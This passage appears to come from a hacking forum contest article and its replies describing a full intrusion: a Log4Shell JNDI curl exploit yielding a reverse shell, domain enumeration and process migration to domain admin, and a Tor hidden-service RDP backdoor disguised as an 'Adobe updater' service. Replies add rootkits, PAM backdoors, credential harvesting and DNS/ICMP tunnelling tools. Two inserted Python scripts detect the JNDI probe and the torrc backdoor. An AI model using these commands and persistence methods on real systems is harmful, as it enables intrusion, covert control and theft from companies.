then from another terminal run the exploit

curl -vv -H "Accept-Language: \${jndi:ldap://serverip:8443/o=tomcat}" --insecure https://10.90.11.100/portal/info.jsp

View attachment 37142

Successfully bypassed the firewall and got a reverse shell to my cloud.
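The probe above and the exploit request both put the `${jndi:ldap://...}` lookup into the Accept-Language header, which is exactly what a defender should be hunting for in proxy or WAF logs. The following Python script is an added example written from that side (not code from the original post): it scans a constructed reverse-proxy log (the log format is an assumption) for that lookup, also after percent-decoding, and collects the callback hosts as egress-block candidates.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from the original post). Assumed format: a reverse
# proxy log recording source IP, request line, status and the Accept-Language header.
SAMPLE_LOG = """\
10.90.11.5 "GET /portal/info.jsp" 200 "Accept-Language: en-US,en;q=0.9"
203.0.113.7 "GET /portal/info.jsp" 200 "Accept-Language: ${jndi:ldap://203.0.113.7:8443/o=tomcat}"
203.0.113.7 "GET /portal/info.jsp" 200 "Accept-Language: %24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D"
10.90.11.6 "GET /index.html" 304 "Accept-Language: fr-FR"
"""

LINE_RE = re.compile(r'^(?P<src>\S+) "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<hdr>[^"]*)"$')
# The ${jndi:<scheme>://<host>[:<port>]...} lookup string that Log4Shell requests carry.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/*(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def normalize(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding so an encoded probe is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_log(text: str) -> list:
    """One finding per line whose Accept-Language header carries a JNDI lookup."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(raw)
        hit = m and JNDI_RE.search(normalize(m.group("hdr")))
        if not hit:
            continue
        findings.append({"line": lineno, "src": m.group("src"), "request": m.group("req"),
                         "scheme": hit.group("scheme").lower(),
                         "callback_host": hit.group("host"), "callback_port": hit.group("port")})
    return findings

def callback_hosts(findings: list) -> set:
    """Hosts the vulnerable server would be made to contact: egress-block / IoC candidates."""
    return {f["callback_host"] for f in findings}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['src']} -> {f['scheme']}://{f['callback_host']}")
    print("egress-block candidates:", sorted(callback_hosts(found)))
```

The same check applies to any other header the application logs into Log4j, since Accept-Language is only the one this write-up happened to use.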

Our connection now looks like this:
View attachment 37144

And what's amazing is that now we are inside the network domain
View attachment 37145
Network domain owning

Once we are on the domain, it's very easy to get domain admin, especially with vulnerabilities like petitpotam, nightmare, remotepotato0, zerologon, misconfigs, etc.

But the easiest way, and the one that worked for me this time, is migrating our payload's process into a process owned by a domain admin.

So we will ask for the domain admins by executing the command

net group "domain admins" /domain

then look at the running processes on the current server and view only the processes that are owned by the domain

tasklist /v|findstr /I "domain name here"

View attachment 37146
As you can see in the figure, all the listed processes are run by a user called "mabutaha", and this user has admin rights, so I will migrate our session into the process with PID 3660. Then we will ask for the domain controllers (DCs) by executing the following command

nltest /dclist:domain_name_here

After that we will check whether we can list the C drive on one of the DCs. If so, it means we are domain admin and we can access all the hosts and servers that are connected to the domain.
View attachment 37147

We are domain admin loool. That was pretty easy and quick. Actually, any company that relies on its firewall for security and does not care about what's behind it has no security at all, because as you have seen, in the end we could bypass the firewall and the IPS and IDS and we ended up domain admin with the ability to control the entire company.

"What I have found from my experience is that companies with firewall rules like this one have network engineers who are big fools, and when I see such a filter it attracts me to the company, because I know that what's behind it is not secure at all. Yes, it's not like that all the time, but it is very common, and I had such a scenario with a multibillion-dollar shareholding US bank: when I bypassed the firewall, almost all the operating systems were weak and vulnerable."

So now we have everything. If you noticed in the figure that shows the domain admins, there is a Veeam backup user, which means we can extract the passwords for the ESXi servers from the backup servers sooooo easily, and I have seen a tutorial here in the previous contest talking about such a thing and explaining how to do it.

Persistence

One of the most important things to do after you own the company is to create a legitimate-looking backdoor to reach the servers without triggering an alarm from an antivirus or any security product. This can be done in many ways, like making a tunnel with ngrok or Tor, installing AnyDesk, or creating your own backdoor and linking it to a server over ICMP, TCP or even DNS.

For me and many other people, making a tunnel over Tor is the best option.

So I will keep it short and quick, because it's very easy to do.

  • Upload tor to the server
  • Extract it anywhere you want
  • Change the torrc file config:
SocksPort 45120 --> the listening port for tor

HiddenServiceDir C:\ProgramData\MSConnect --> path for the hidden service

HiddenServicePort 80 127.0.0.1:3389 --> connect through port 80 to the current host's RDP on port 3389

MaxCircuitDirtiness 10 --> keep it or change it, it's up to you

Create a service for the tor process with the name you like

sc create "Adobe updater" binpath= "path for tor.exe process --nt-service -f \"path for torrc file\"" start= auto

sc start "Adobe updater"

Get the hostname that Tor has created for you

type C:\ProgramData\MSConnect\hostname

Copy the output, because you will need it to connect to the server.

Now, when you want to connect to the server, you have to run Tor on your Kali machine --> set the proxychains config to tunnel via Tor

Then execute the following command

proxychains rdesktop hostname_here:port

The port in the torrc file is 80

proxychains rdesktop hostname_here:80

That's it 😆😆😆
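From the defender's side, the persistence described above leaves a torrc on disk whose HiddenServicePort forwards an onion virtual port onto the host's own RDP port. The following Python script is an added example (not code from the original post) that parses a constructed torrc modelled on that setup and reports every onion service that exposes a remote-admin port; the set of admin ports it flags is an assumption you should adapt to your estate.

```python
# Constructed torrc modelled on the persistence setup described above (not a file from the post).
SAMPLE_TORRC = """\
SocksPort 45120
HiddenServiceDir C:\\ProgramData\\MSConnect
HiddenServicePort 80 127.0.0.1:3389
MaxCircuitDirtiness 10
# a second service that only exposes a local web port
HiddenServiceDir C:\\ProgramData\\Web
HiddenServicePort 8080
"""

# Target ports whose exposure through an onion service hands out remote admin access (assumed list).
ADMIN_PORTS = {22: "ssh", 445: "smb", 3389: "rdp", 5985: "winrm", 5986: "winrm-tls"}

def parse_torrc(text: str) -> list:
    """Group each HiddenServicePort under the HiddenServiceDir that precedes it (Tor's own rule)."""
    services, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()                         # torrc keys are case-insensitive
        if key == "hiddenservicedir":
            current = {"dir": value.strip(), "ports": []}
            services.append(current)
        elif key == "hiddenserviceport" and current is not None:
            parts = value.split()
            virtport = int(parts[0])
            # A missing or bare-port target means 127.0.0.1:<port>, as the Tor manual documents.
            target = parts[1] if len(parts) > 1 else f"127.0.0.1:{virtport}"
            host, _, port = target.rpartition(":")
            if not host:
                host, port = "127.0.0.1", target
            current["ports"].append({"virtport": virtport, "host": host, "port": int(port)})
    return services

def find_exposed_admin(services: list) -> list:
    """(dir, virtport, target, service) for every forward that lands on an admin port."""
    return [(s["dir"], p["virtport"], f'{p["host"]}:{p["port"]}', ADMIN_PORTS[p["port"]])
            for s in services for p in s["ports"] if p["port"] in ADMIN_PORTS]

if __name__ == "__main__":
    for hit in find_exposed_admin(parse_torrc(SAMPLE_TORRC)):
        print("onion service in %s exposes %s (%s) as virtual port %d" % (hit[0], hit[2], hit[3], hit[1]))
```

Pair this with a check of service binaries launched with `--nt-service -f <torrc>`, since that is how the post registers the process, so that a torrc found anywhere on disk can be tied back to the service that loads it.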

I spent hours writing this article, so if you have found something unclear, please don't hesitate to ask me and I will try my best to make it clear to you.

Guys, I still have two other articles to submit to the contest and I think we still have plenty of time, so if you want anything to be explained or have any ideas for articles, please tell me in the comments.



The attachments:
Link 1
Link 2

Thanks for reading😊
Very good article)
 
They didn't give thanks to you))
Very good article)

I don't understand what you mean by "They didn't give thanks to you"

Anyway, the URL you posted is talking about a vulnerability that affects Sophos firewall; it's a zero-day vulnerability. And my article is explaining how you can bypass the firewall filter rules and access what's behind them, create your own tunnels until you get a reverse shell, and this method can be implemented for any firewall, not just Sophos, BECAUSE IT'S NOT A VULNERABILITY, IT'S A BYPASSING TECHNIQUE
Sophos firewall is just a small part of this article; the article is talking about many advanced techniques, not just how to bypass the firewall's hard rules.
 
Haven't you seen that legendary video where НСД sat there looking intimidated next to the cop-like face of ВорВЗаконе and, in a stammering voice, explained the Skype flooding system they had bolted onto Gozi and were offering for rent? And both of them were trying to prove to Maza what, damn it, successful cybercriminals they were?


Sorry for the off-topic.
rumor has it he still hasn't figured out where the beeping is coming from or what it is. and neither has the cleaning lady) like I said, they don't make them like that anymore
 
Hey man, great article.
I really liked how you abused the juicy configuration and databases to move across the Linux part of the network.
I'm not a fan of writing ssh auth keys, but if you don't care (or have more time) give these linux rootkits a shot:

Also i had success getting some credentials on .history files.
keep up the good job!
 
I'm happy you liked it. And yes, planting a rootkit is a great technique, especially when the ssh protocol is not enabled; by uploading it and scheduling the execution it will bypass some limitations. Thank you for your response and the addition to the article.
 
oh my god, what books do you read to know all that shit??(( its fckng incredible for me. im lamer as fuck. jesus...guys please send some literature about all that shit, i want to know everything
Dude, as I mentioned in the article, you can ask me anything and I will answer. I tried my best to explain everything in detail, so if you didn't understand something just go ahead and ask me 😊
 
Yea it's really great, depending on your necessity you could also go for a PAM backdoor.
You can get lucky snatching credentials via ftp, mysql, sudo, su and other stuff. If they use ssh keys we kinda get into a dead-end (i feel you).
Also I don't know if you knew, but we can also create tunnels via dns using dnscat!
Using the listen option we can do something like
--------------------
command (websrv-app2) 15> listen 127.0.0.1:7001 10.200.76.51:22
Listening on 127.0.0.1:7001, sending connections to 10.200.76.51:22
command (websrv-app2) 15> Connection from 127.0.0.1:35064; forwarding to 10.200.76.51:22...
[Tunnel 0] connection successful!
--------------------------
^
So if you're struggling writing a webshell you could also go str8 for dnscat tunnels (but it's slow as fukkk) [the command above was reproduced on a linux machine]
 
Exactly, as a good alternative for Linux OS we can use iodine dns tunnels; it's much faster than DNSCat2 but sometimes it doesn't work well. But there is a much better option, which is "hans", which uses the ICMP protocol, which makes it much faster and more stable at the same time, but in my case it wasn't allowed through the firewall, that's why I tried to tunnel over http. Sometimes you will need to send your traffic over ssh over http
ssh->http, this happens when we have an internal firewall with any kind of detection system
 
Yea, I didn't have much contact with iodine tunnels. Will check it out at the next opportunity when dnscat doesn't do the work. I had success with https://github.com/utoni/ptunnel-ng in the past for pivoting some basic shit via ICMP =))
And when it comes to http webshell tunnels I'm a big fan of regeorge and pivotnacci (https://github.com/blackarrowsec/pivotnacci).
Getting ssh is cool because we also get more flexibility and a pty/tty session, which is the best in linux scenarios.
I faced a similar situation on a windows network some months ago. Not even DNS was allowed! So I went for writing a tunnel webshell and doing most shit via impacket and nmap (via socks).
Pain in the ass, but eventually I got DA and used some whonix VMs to make the RDP from my tunnel webshell (change the tunnel from localhost like ur vps to something like the vps external IP so it acts like an 'external' proxy).
 

